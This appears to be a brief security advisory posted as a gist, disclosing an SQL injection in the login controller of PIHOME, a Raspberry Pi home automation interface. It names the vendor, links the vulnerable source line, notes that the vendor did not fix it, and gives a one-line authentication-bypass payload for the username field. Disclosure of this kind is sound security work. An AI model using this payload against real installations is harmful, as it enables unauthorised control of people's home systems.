@xsuperbug
Last active November 11, 2015 15:33
Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : SQL Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Details :
1- SQL Injection :
Source Code:
https://github.com/cerosx/RPI.PIHome2.0-GUI-Frontend/blob/master/pihome/controllers/loginController.php#L45
Payload:
username : ' OR '1'='1 --
-----
6 October : Informed Vendor about Issue.
* : This issue was not fixed by the vendor.